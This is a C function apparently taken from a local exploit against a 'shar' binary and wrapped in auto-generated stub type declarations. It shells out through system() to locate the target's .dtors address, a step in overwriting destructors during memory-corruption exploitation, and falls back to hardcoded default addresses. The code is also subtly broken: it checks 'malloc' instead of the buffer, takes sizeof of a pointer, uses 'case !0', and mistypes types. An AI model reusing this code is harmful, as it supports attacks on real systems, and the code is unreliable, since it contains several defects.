
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_int32_t ;
typedef int tmpfull ;
typedef int ssize_t ;
typedef char int8_t ;
typedef int int16_t ;
typedef int buffer ;
typedef int FILE ;


 int DEFAULT_DTORS_SHAR ;
 int DEFAULT_DTORS_UNSHAR ;
 int EXIT_FAILURE ;
 char* GET_DTORS_CMD ;
 char* SHAR_PATH ;
 int bzero (char*,int) ;
 int err (int,char*) ;
 int errno ;
 int exit (int ) ;
 int fclose (int *) ;
 int fflush (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int ,char*,...) ;
 int free (char*) ;
 int getline (char**,int*,int *) ;
 scalar_t__ malloc (int) ;
 scalar_t__ mkstemp (char*) ;
 int snprintf (char*,int,char*,char*,char*) ;
 int stdout ;
 int strerror (int ) ;
 int strlen (char*) ;
 int strncpy (char*,char*,int) ;
 int strtoul (char*,char**,int) ;
 int system (char*) ;
 int unlink (char*) ;

u_int32_t get_dtors(int8_t* path) {

 FILE *readit;
 int *tmpfile;
 int8_t tmpfull[32];
 char *store_dtors;

 int16_t status;
 int16_t length;

 ssize_t read;
 u_int32_t findme;
 int8_t *dtorsbuf = ((void*)0);
 bzero((int8_t *)tmpfull,sizeof(tmpfull));

 strncpy(tmpfull,"/tmp/candyXXXXXX",strlen("/tmp/candyXXXXXX"));
 tmpfile = (int *)mkstemp((int8_t *)tmpfull);
 int8_t *buffer = (int8_t *) malloc(100 * sizeof(int8_t *));
 if(!malloc) { err(1,"malloc"); exit(EXIT_FAILURE); }

 bzero(buffer,sizeof(buffer));
 snprintf(buffer,100,GET_DTORS_CMD,path,tmpfull);
 buffer[strlen(buffer)] = '\0';

 int8_t *shar_path = SHAR_PATH;
 status = system(buffer);


 switch((status >> 8 ) & 0xff) {

          case 0:
          fprintf(stdout,"[+]Utilities check successful, no Need Defaults\n");
          break;

          case !0:
          fprintf(stdout,"[+]Using default .Dtors address\n");
          findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR;
          goto GO_ON;

          default:
          fprintf(stdout,"[+]Using default .Dtors address\n");
          fprintf(stdout,"[+]Dtors address => 0x%x\n",DEFAULT_DTORS_SHAR );
          findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR;
          goto GO_ON;
   }



       if ( (readit = fopen(tmpfull,"rb")) == ((void*)0) ) {
          strerror(errno);
          fprintf(stdout,"[+]Using default .Dtors address\n");
          findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR;
          goto GO_ON;
          }
          read = getline(&dtorsbuf,&length,readit);

     fflush(readit);
     dtorsbuf[strlen(dtorsbuf) -1 ] = '\0';
     findme = strtoul(dtorsbuf,&store_dtors,16);

     fclose(readit);
     free(dtorsbuf);
     unlink(tmpfull);
     fprintf(stdout,"[+]Dtors address found => 0x%x\n",findme + 0x4);
GO_ON:
     unlink(tmpfull);
     return(findme + 4);
}
